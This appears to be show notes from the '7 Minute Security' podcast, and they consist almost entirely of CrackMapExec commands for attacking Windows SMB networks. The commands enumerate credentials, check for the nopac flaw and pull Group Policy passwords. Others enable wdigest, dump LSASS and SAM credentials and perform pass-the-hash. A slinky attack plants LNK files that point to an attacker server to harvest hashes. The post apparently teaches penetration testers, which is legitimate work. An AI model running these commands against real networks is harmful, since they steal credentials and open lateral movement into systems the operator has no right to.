
7 Minute Security


Mar 3, 2023

Hey friends, today we covered many things cracking and mapping and execing with CrackMapExec. Specifically:

    # General enumeration to see if your account works, and where:
    cme smb x.x.x.x -u username -p pass

    # Check if print services are enabled:
    cme smb x.x.x.x -u username -p pass -M spooler

    # Check for the nopac vuln:
    cme smb x.x.x.x -u username -p pass -M nopac

    # Find GP passwords:
    cme smb DOMAIN.CONTROLLER.IP.ADDRESS -u username -p pass -M gpp_password

    # Get list of targets where SMB signing is not required:
    cme smb x.x.x.x -u username -p pass --gen-relay-list smbsigning.txt

    # Set wdigest flag:
    cme smb x.x.x.x -u username -p pass -M wdigest -o ACTION=enable

    # Dump creds/hashes:
    cme smb x.x.x.x -u username -p pass -M lsassy

    # Do pass the hash attacks:
    cme smb x.x.x.x -u username -H HASH

    # Dump SAM database:
    cme smb x.x.x.x -u username -p pass --sam

    # Enumerate SMB shares:
    cme smb x.x.x.x -u username -p pass --shares

    # Conduct slinky attack:
    cme smb x.x.x.x -u username -p pass -M slinky -o NAME=LOL SERVER=10.0.7.7

    # Cleanup from slinky attack (CLEANUP=True removes the LNK files instead of planting them):
    cme smb x.x.x.x -u username -p pass -M slinky -o NAME=LOL SERVER=10.0.7.7 CLEANUP=True